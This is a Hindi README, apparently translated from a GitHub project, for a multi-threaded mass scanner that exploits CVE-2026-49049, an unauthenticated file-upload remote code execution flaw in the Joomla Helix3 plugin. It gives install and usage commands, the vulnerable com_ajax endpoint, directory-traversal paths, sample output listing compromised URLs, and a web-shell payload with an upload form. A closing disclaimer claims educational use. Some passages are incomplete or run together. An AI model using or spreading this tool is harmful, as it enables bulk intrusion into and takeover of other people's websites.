
CVE-2026-49049 के लिए मास भेद्यता स्कैनर – Joomla Helix3 प्लगइन में अनप्रमाणित रिमोट कोड निष्पादन। मल्टी-थ्रेडेड, निष्पादित और रॉ PHP पेलोड दोनों का पता लगाता है।
CVE-2026-49049 के लिए मास भेद्यता स्कैनर - Joomla Helix3 Framework में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (Unauthenticated Remote Code Execution)।
यह टूल कई Joomla साइटों की Helix3 प्लगइन में पाई गई CVE-2026-49049 भेद्यता के लिए जाँच करता है। यह भेद्यता एक अनप्रमाणित (unauthenticated) हमलावर को लक्षित सर्वर पर मनमाना PHP कोड अपलोड करने और निष्पादित करने की अनुमति देती है।
स्कैनर निम्नलिखित प्रयास करता है:
helix3 प्लगइन के साथ com_ajax एंडपॉइंट का शोषण करना।requests लाइब्रेरीpip install requests
🛠 इंस्टॉलेशन
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 उपयोग
python2 cve-2026-49049.py targets.txt
इनपुट प्रारूप
targets.txt की प्रत्येक पंक्ति में एक डोमेन या IP होना चाहिए:
example.com
https://example.com
http://192.168.1.100
आउटपुट फ़ाइलें
फ़ाइल विवरण results.txt वे असुरक्षित URL जहाँ पेलोड निष्पादित किया गया rez.txt वे URL जहाँ पेलोड अपलोड किया गया लेकिन निष्पादित नहीं किया गया (रॉ PHP)
उदाहरण आउटपुट
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ कॉन्फ़िगरेशन
आप स्क्रिप्ट के अंदर निम्नलिखित चर (variables) समायोजित कर सकते हैं:
चर डिफ़ॉल्ट विवरण THREADS 20 समवर्ती थ्रेड्स की संख्या PATHS ['../../../', '../../../../'] डायरेक्टरी ट्रैवर्सल पथ TIMEOUT 5 HTTP अनुरोध टाइमआउट RESULT_FILE 'results.txt' असुरक्षित साइटों के लिए आउटपुट फ़ाइल RAW_RESULT_FILE 'rez.txt' रॉ PHP साइटों के लिए आउटपुट फ़ाइल
🧠 यह कैसे काम करता है
स्क्रिप्ट निम्नलिखित पर एक POST अनुरोध भेजती है:
/index.php?option=com_ajax&plugin=helix3&format=json
ऐसे पेलोड के साथ जो:
फिर यह जाँचता है कि फ़ाइल सुलभ है या नहीं और PHP कोड निष्पादित होता है या केवल सादे टेक्स्ट के रूप में प्रदर्शित होता है।
पेलोड उदाहरण
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ अस्वीकरण
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
इस टूल का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग, जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध है। लेखक इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।
अधिक अस्वीकरण: आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ देखें !!! देख सकते हैं।